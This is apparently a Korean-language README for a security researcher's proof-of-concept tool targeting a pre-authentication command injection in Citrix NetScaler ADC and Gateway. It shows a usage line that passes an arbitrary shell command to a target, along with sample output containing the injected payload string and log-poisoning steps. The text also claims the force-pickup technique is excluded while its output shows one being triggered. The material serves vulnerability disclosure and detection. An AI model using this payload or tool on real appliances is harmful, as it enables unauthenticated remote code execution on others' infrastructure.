
Citrix NetScaler CVE-2026-88771에 대한 탐지 아티팩트 생성기로, ADC 및 Gateway 배포를 대상으로 사전 인증 명령 주입을 악용하여 원격 코드 실행을 달성합니다.
Citrix NetScaler CVE-2026-88771 탐지 아티팩트 생성기
기술적 세부 사항은 블로그 게시물을 참조하세요.
./watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py --target https://netscaler.local/ --command 'id>/var/tmp/watchTowr'
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-CVE-2026-88771.py
(*) Citrix NetScaler PreAuth Command Injection to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-88771]
[+] connected to https://netscaler.local/
[*] payload built: pitboss PPE unexpectedly died NSPPE;id>/var/tmp/watchTowr;# X
[+] poisoning the logs...
[*] triggering force pickup...
[*] remote force pickup in progress
[*] done
명령이 픽업되기까지 최대 24시간이 걸릴 수 있습니다 또한, force pickup 기법은 포함되어 있지 않습니다
모든 NetScaler ADC 및 NetScaler Gateway 배포 (기본 구성 / 추가 기능 필요 없음)
영향을 받는 버전 목록은 Citrix 공식 권고문을 참조하세요.
최신 보안 연구를 위해 watchTowr Labs 팀을 팔로우하세요